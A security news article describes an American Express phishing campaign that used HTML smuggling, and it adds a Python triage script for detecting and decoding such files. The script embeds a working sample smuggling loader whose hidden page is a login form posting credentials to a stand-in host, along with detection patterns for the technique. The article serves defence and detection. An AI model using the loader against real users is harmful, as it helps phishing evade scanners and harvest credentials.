Hackers Abuse HTML Smuggling To Deliver Phishing Attack


HTML smuggling is a sophisticated technique used by threat actors to deliver malware by embedding malicious JavaScript within seemingly harmless HTML files.

This method exploits HTML5 and JavaScript features, allowing attackers to construct payloads directly on the victim’s machine when the HTML file is opened.


Trustwave SpiderLabs researchers recently identified that hackers have been actively abusing HTML smuggling to deliver sophisticated phishing pages.

Hackers Abuse HTML Smuggling Technique

Researchers uncovered a “sophisticated phishing campaign” employing “HTML smuggling.” The attack vector began with an email impersonating “American Express,” and this email contains a clickable link that acts as a ‘redirector.’


This initial redirect led to a second redirector, which ultimately pointed to a “Cloudflare R2” public bucket hosting an ‘HTML file.’

Generated blob HTML phishing page (Source – Trustwave)

The “JavaScript” utilized ‘HTML smuggling’ by encoding the actual phishing page as a long ‘Base64 string.’ Upon execution, the script decodes the ‘Base64 string’ into plain “HTML” using the “atob() function.”

Attack chain (Source – Trustwave)

It then creates a “Blob object” from the ‘decoded HTML,’ generates a ‘blob URL’ for it using “window.URL.createObjectURL(),” and finally loads that content into the current browser window by assigning the URL to “window.location.href.”
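The decode-to-blob-to-navigate chain described above leaves a recognisable footprint in the HTML file itself. As an added example (not Trustwave's tooling), the following Python triage script flags that pattern and recovers the smuggled page for analysis; the sample HTML, the 200-character base64 threshold and the indicator names are constructed assumptions, not values from the campaign.

```python
import base64
import binascii
import re

# Constructed sample: a minimal smuggling loader of the kind the article describes.
# The smuggled page is a harmless placeholder, not the real phishing page.
_PLACEHOLDER_PAGE = (
    b"<html><head><title>Account verification</title></head><body>"
    b"<p>Please confirm your details to keep your account active.</p>"
    b"<form action='https://example.invalid/submit'><input name='username'>"
    b"<input name='password'><input type='submit'></form></body></html>"
)
SAMPLE_PAYLOAD = base64.b64encode(_PLACEHOLDER_PAGE).decode()
SAMPLE_HTML = f"""<html><body><script>
var b = "{SAMPLE_PAYLOAD}";
var h = atob(b);
var blob = new Blob([h], {{type: "text/html"}});
window.location.href = window.URL.createObjectURL(blob);
</script></body></html>"""

# Browser APIs that together form the smuggling chain (assumed indicator names).
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "Blob": re.compile(r"\bnew\s+Blob\s*\("),
    "createObjectURL": re.compile(r"\bcreateObjectURL\s*\("),
    "location_redirect": re.compile(r"\blocation(?:\.href)?\s*="),
}
# Quoted base64 literal long enough to hold a page; 200 chars is an assumed threshold.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{200,}={0,2})[\"']")

def find_indicators(html: str) -> list[str]:
    """Return the names of smuggling-chain APIs present in the file."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]

def extract_payloads(html: str) -> list[bytes]:
    """Decode every long base64 literal; skip strings that are not valid base64."""
    payloads = []
    for m in B64_LITERAL.finditer(html):
        try:
            payloads.append(base64.b64decode(m.group(1), validate=True))
        except (ValueError, binascii.Error):
            continue
    return payloads

def analyse(html: str) -> dict:
    """Score a file: chain APIs plus a decodable embedded page is the smuggling pattern."""
    indicators = find_indicators(html)
    payloads = extract_payloads(html)
    decoded_html = [p for p in payloads if b"<html" in p.lower() or b"<form" in p.lower()]
    return {
        "indicators": indicators,
        "payload_count": len(payloads),
        "decoded_html_count": len(decoded_html),
        "suspicious": len(indicators) >= 3 and bool(payloads),
    }
```

Recovered payloads can be handed to the same URL and form analysis you would apply to a server-hosted page, which is exactly what the blob URL step is meant to keep away from email and proxy scanners.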

By delivering the malicious payload as seemingly harmless “HTML and JavaScript,” the attackers evade certain security measures. This complete mechanism enables them to reveal the true phishing page only upon client-side execution.

The entire process illustrates a “multi-stage” attack chain that is specifically designed to evade detection and deliver a convincing phishing experience to potential victims.

“Blob URLs and URIs” are temporary web addresses that reference the binary data stored in blob objects.

These objects let threat actors handle files and media flexibly within the web browser.

Threat actors exploit this technology via “HTML smuggling” to generate malicious files directly in the “user’s browser” rather than ‘downloading them from a server.’

This method creates the files “client-side,” which helps evade security measures that monitor ‘incoming server-side content.’

Besides this, HTML smuggling enables the covert distribution of harmful payloads disguised as harmless data.

Using blob URLs to create and handle files locally enables attackers to conduct covert operations that are difficult to notice and trace.

This technique is particularly effective in the cloud era, as it evades the “email scanners,” “endpoint protection,” and other “security tools” by hiding phishing content within seemingly harmless HTML files.

This process usually involves embedding obfuscated JavaScript code which, when executed, makes use of blob URLs to generate and deploy a malicious payload. This complete process makes detection more challenging.
